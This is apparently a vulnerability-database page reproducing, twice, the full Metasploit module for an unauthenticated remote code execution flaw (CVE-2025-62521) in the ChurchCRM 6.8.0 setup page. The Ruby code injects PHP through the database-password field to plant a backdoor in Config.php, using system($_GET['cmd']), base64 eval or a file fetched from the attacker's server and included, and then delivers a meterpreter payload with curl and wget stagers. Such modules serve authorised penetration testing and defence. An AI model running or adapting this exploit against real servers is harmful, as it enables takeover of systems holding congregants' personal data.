ChurchCRM Unauthenticated RCE 6.8.0_MSF:EXPLOIT-MULTI-HTTP-CHURCHCRM_INSTALL_UNAUTH_RCE-

10 / 10

CRITICAL

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Description

This module exploits an unauthenticated remote code execution vulnerability in the installation process of ChurchCRM versions 6.8.0 and earlier. By sending a specially crafted POST request to the 'setup' page, an attacker can execute arbitrary commands...

Visit Original Source

Basic Information

ID MSF:EXPLOIT-MULTI-HTTP-CHURCHCRM_INSTALL_UNAUTH_RCE-

Published Feb 16, 2026 at 18:59

Affected Product

Affected Versions ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
include Msf::Exploit::Remote::HttpServer

def initialize(info = {})
super(
update_info(
info,
'Name' => 'ChurchCRM Unauthenticated RCE 6.8.0',
'Description' => %q{
This module exploits an unauthenticated remote code execution
vulnerability in the installation process of ChurchCRM versions
6.8.0 and earlier. By sending a specially crafted POST request to
the 'setup' page, an attacker can execute arbitrary commands on the
target server. This module uploads a meterpreter payload to the
target server and executes it, allowing for remote code execution.
},
'License' => MSF_LICENSE,
'Author' => ['LucasCsmt'],
'References' => [
[ 'GHSA', 'm8jq-j3p9-2xf3'],
[ 'CVE', '2025-62521']
],
'Platform' => ['linux', 'php'],
'Targets' => [
[
'Linux/unix Command (CmdStager)',
{
'Arch' => [ ARCH_X86, ARCH_X64 ],
'Platform' => ['linux'],
'Type' => :nix_cmdstager,
'DefaultOptions' => {
'InitialAutoRunScript' => 'post/multi/general/execute COMMAND="rm Include/Config.php"'
},
'CmdStagerFlavor' => [
'printf', 'echo', 'bourne', 'fetch', 'curl', 'wget'
]
}
],
[
'PHP (In-Memory)',
{
'Arch' => [ ARCH_PHP ],
'Platform' => ['php'],
'Type' => :php_memory,
'DefaultOptions' => {
'InitialAutoRunScript' => 'post/multi/general/execute COMMAND="php -r \"unlink(\'Include/Config.php\');\""'
}
}
],
[
'PHP (fetch)',
{
'Arch' => [ ARCH_PHP ],
'Platform' => ['php'],
'Type' => :php_fetch,
'DefaultOptions' => {
'InitialAutoRunScript' => 'post/multi/general/execute COMMAND="php -r \"unlink(\'Include/Config.php\');\""'
}
}
],
],
'DisclosureDate' => '2025-12-17',
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES]
}
)
)

register_options(
[
OptString.new('TARGETURI', [true, 'Base path', '/']),
]
)
end

# Check if the target is up by accessing the setup page
def check
print_status('Checking if the target is reachable...')

res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'setup', '/')
})

unless res && (res.code == 301 || res.code == 200 || res.code == 302)
fail_with(Failure::Unreachable, 'Target is not reachable')
return Exploit::CheckCode::Unknown('Target setup page is inaccessible')
end

version = res.headers['CRM-VERSION']
if version
print_status("Found ChurchCRM version: #{version}")
if Rex::Version.new(version) <= Rex::Version.new('6.8.0')
return Exploit::CheckCode::Appears("Vulnerable version #{version} detected via CRM-VERSION header.")
else
return Exploit::CheckCode::Safe("Version #{version} is not vulnerable.")
end
end

return Exploit::CheckCode::Appears
end

# Build the payload that will be into the installation form
#
# @return : the payload
def build_payload
case target['Type']
when :php_memory
b64_payload = Rex::Text.encode_base64(payload.encoded)
"#{rand_text_alpha(3)}'; eval(base64_decode(\"#{b64_payload}\")); //"
when :php_fetch
start_service
payload_name = '/tmp/' + rand_text_alpha(5..10) + '.php'
"#{rand_text_alpha(3)}'; $f='#{payload_name}'; file_put_contents($f, file_get_contents('#{get_uri}')); register_shutdown_function('unlink', $f); include($f); //"
else
"#{rand_text_alpha(3)}'; system($_GET['cmd']); //"
end
end

# Send a POST request to the setup page in order to execute commands
def alter_config
print_status('Injecting backdoor into Include/Config.php via setup page...')

res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'setup', '/'),
'vars_post' => {
'DB_SERVER_NAME' => rand_text_alpha(5..10),
'DB_SERVER_PORT' => '3306',
'DB_NAME' => rand_text_alpha(5..10),
'DB_USER' => rand_text_alpha(5..8),
'DB_PASSWORD' => build_payload,
'ROOT_PATH' => '/',
'URL' => "http://#{rand_text_alpha(5..10)}.com/"
}
})

msg = 'Failed to inject backdoor into Include/Config.php. ' \
'This can happen if the setup process has already been ' \
'completed or if the target is not vulnerable.'
fail_with(Failure::UnexpectedReply, msg) unless res&.code == 200
end

# Execute command on the target server
#
# @param cmd [String] the command to execute
def execute_command(cmd, _opts = {})
send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path),
'vars_get' => { 'cmd' => cmd }
})
end

# Execute PHP code on the target server in order to run the payload
def execute_php
print_status('Trying to execute the PHP payload')

send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path)
})

print_good('PHP payload successfully executed')
end

# Upload the payload to the target server
def execute_linux
print_status('Uploading payload to the target server...')

execute_cmdstager(
linemax: 500,
nodelete: false,
background: true,
temp: '/tmp'
)

print_good('Payload uploaded successfully.')
end

# Handles the incoming HTTP request and serves the payload to the target.
def on_request_uri(cli, _request)
p = payload.encoded
send_response(cli, p, {
'Content-Type' => 'application/x-httpd-php',
'Pragma' => 'no-cache'
})
end

def exploit
alter_config

case target['Type']
when :nix_cmdstager
execute_linux
else
execute_php
end
end
end

{
    "lastseen": "2026-02-16T19:28:04",
    "description": "This module exploits an unauthenticated remote code execution vulnerability in the installation process of ChurchCRM versions 6.8.0 and earlier. By sending a specially crafted POST request to the 'setup' page, an attacker can execute arbitrary commands...",
    "published": "2026-02-16T18:59:51",
    "modified": "2026-02-16T18:59:51",
    "type": "metasploit",
    "title": "ChurchCRM Unauthenticated RCE 6.8.0",
    "source": "",
    "references": "",
    "id": "MSF:EXPLOIT-MULTI-HTTP-CHURCHCRM_INSTALL_UNAUTH_RCE-",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2025-62521"
    ],
    "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n  Rank = NormalRanking\n\n  include Msf::Exploit::Remote::HttpClient\n  include Msf::Exploit::CmdStager\n  include Msf::Exploit::Remote::HttpServer\n\n  def initialize(info = {})\n    super(\n      update_info(\n        info,\n        'Name' => 'ChurchCRM Unauthenticated RCE 6.8.0',\n        'Description' => %q{\n          This module exploits an unauthenticated remote code execution\n          vulnerability in the installation process of ChurchCRM versions\n          6.8.0 and earlier. By sending a specially crafted POST request to\n          the 'setup' page, an attacker can execute arbitrary commands on the\n          target server. This module uploads a meterpreter payload to the\n          target server and executes it, allowing for remote code execution.\n        },\n        'License' => MSF_LICENSE,\n        'Author' => ['LucasCsmt'],\n        'References' => [\n          [ 'GHSA', 'm8jq-j3p9-2xf3'],\n          [ 'CVE', '2025-62521']\n        ],\n        'Platform' => ['linux', 'php'],\n        'Targets' => [\n          [\n            'Linux/unix Command (CmdStager)',\n            {\n              'Arch' => [ ARCH_X86, ARCH_X64 ],\n              'Platform' => ['linux'],\n              'Type' => :nix_cmdstager,\n              'DefaultOptions' => {\n                'InitialAutoRunScript' => 'post/multi/general/execute COMMAND=\"rm Include/Config.php\"'\n              },\n              'CmdStagerFlavor' => [\n                'printf', 'echo', 'bourne', 'fetch', 'curl', 'wget'\n              ]\n            }\n          ],\n          [\n            'PHP (In-Memory)',\n            {\n              'Arch' => [ ARCH_PHP ],\n              'Platform' => ['php'],\n              'Type' => :php_memory,\n              'DefaultOptions' => {\n                'InitialAutoRunScript' => 'post/multi/general/execute COMMAND=\"php -r \\\"unlink(\\'Include/Config.php\\');\\\"\"'\n              }\n            }\n          ],\n          [\n            'PHP (fetch)',\n            {\n              'Arch' => [ ARCH_PHP ],\n              'Platform' => ['php'],\n              'Type' => :php_fetch,\n              'DefaultOptions' => {\n                'InitialAutoRunScript' => 'post/multi/general/execute COMMAND=\"php -r \\\"unlink(\\'Include/Config.php\\');\\\"\"'\n              }\n            }\n          ],\n        ],\n        'DisclosureDate' => '2025-12-17',\n        'DefaultTarget' => 0,\n        'Notes' => {\n          'Stability' => [CRASH_SAFE],\n          'Reliability' => [REPEATABLE_SESSION],\n          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES]\n        }\n      )\n    )\n\n    register_options(\n      [\n        OptString.new('TARGETURI', [true, 'Base path', '/']),\n      ]\n    )\n  end\n\n  # Check if the target is up by accessing the setup page\n  def check\n    print_status('Checking if the target is reachable...')\n\n    res = send_request_cgi({\n      'method' => 'GET',\n      'uri' => normalize_uri(target_uri.path, 'setup', '/')\n    })\n\n    unless res && (res.code == 301 || res.code == 200 || res.code == 302)\n      fail_with(Failure::Unreachable, 'Target is not reachable')\n      return Exploit::CheckCode::Unknown('Target setup page is inaccessible')\n    end\n\n    version = res.headers['CRM-VERSION']\n    if version\n      print_status(\"Found ChurchCRM version: #{version}\")\n      if Rex::Version.new(version) <= Rex::Version.new('6.8.0')\n        return Exploit::CheckCode::Appears(\"Vulnerable version #{version} detected via CRM-VERSION header.\")\n      else\n        return Exploit::CheckCode::Safe(\"Version #{version} is not vulnerable.\")\n      end\n    end\n\n    return Exploit::CheckCode::Appears\n  end\n\n  # Build the payload that will be into the installation form\n  #\n  # @return : the payload\n  def build_payload\n    case target['Type']\n    when :php_memory\n      b64_payload = Rex::Text.encode_base64(payload.encoded)\n      \"#{rand_text_alpha(3)}'; eval(base64_decode(\\\"#{b64_payload}\\\")); //\"\n    when :php_fetch\n      start_service\n      payload_name = '/tmp/' + rand_text_alpha(5..10) + '.php'\n      \"#{rand_text_alpha(3)}'; $f='#{payload_name}'; file_put_contents($f, file_get_contents('#{get_uri}')); register_shutdown_function('unlink', $f); include($f); //\"\n    else\n      \"#{rand_text_alpha(3)}'; system($_GET['cmd']); //\"\n    end\n  end\n\n  # Send a POST request to the setup page in order to execute commands\n  def alter_config\n    print_status('Injecting backdoor into Include/Config.php via setup page...')\n\n    res = send_request_cgi({\n      'method' => 'POST',\n      'uri' => normalize_uri(target_uri.path, 'setup', '/'),\n      'vars_post' => {\n        'DB_SERVER_NAME' => rand_text_alpha(5..10),\n        'DB_SERVER_PORT' => '3306',\n        'DB_NAME' => rand_text_alpha(5..10),\n        'DB_USER' => rand_text_alpha(5..8),\n        'DB_PASSWORD' => build_payload,\n        'ROOT_PATH' => '/',\n        'URL' => \"http://#{rand_text_alpha(5..10)}.com/\"\n      }\n    })\n\n    msg = 'Failed to inject backdoor into Include/Config.php. ' \\\n      'This can happen if the setup process has already been ' \\\n      'completed or if the target is not vulnerable.'\n    fail_with(Failure::UnexpectedReply, msg) unless res&.code == 200\n  end\n\n  # Execute command on the target server\n  #\n  # @param cmd [String] the command to execute\n  def execute_command(cmd, _opts = {})\n    send_request_cgi({\n      'method' => 'GET',\n      'uri' => normalize_uri(target_uri.path),\n      'vars_get' => { 'cmd' => cmd }\n    })\n  end\n\n  # Execute PHP code on the target server in order to run the payload\n  def execute_php\n    print_status('Trying to execute the PHP payload')\n\n    send_request_cgi({\n      'method' => 'GET',\n      'uri' => normalize_uri(target_uri.path)\n    })\n\n    print_good('PHP payload successfully executed')\n  end\n\n  # Upload the payload to the target server\n  def execute_linux\n    print_status('Uploading payload to the target server...')\n\n    execute_cmdstager(\n      linemax: 500,\n      nodelete: false,\n      background: true,\n      temp: '/tmp'\n    )\n\n    print_good('Payload uploaded successfully.')\n  end\n\n  # Handles the incoming HTTP request and serves the payload to the target.\n  def on_request_uri(cli, _request)\n    p = payload.encoded\n    send_response(cli, p, {\n      'Content-Type' => 'application/x-httpd-php',\n      'Pragma' => 'no-cache'\n    })\n  end\n\n  def exploit\n    alter_config\n\n    case target['Type']\n    when :nix_cmdstager\n      execute_linux\n    else\n      execute_php\n    end\n  end\nend\n",
    "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/churchcrm_install_unauth_rce.rb",
    "cvss": {
        "score": 10,
        "severity": "CRITICAL",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://www.rapid7.com/db/modules/exploit/multi/http/churchcrm_install_unauth_rce/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply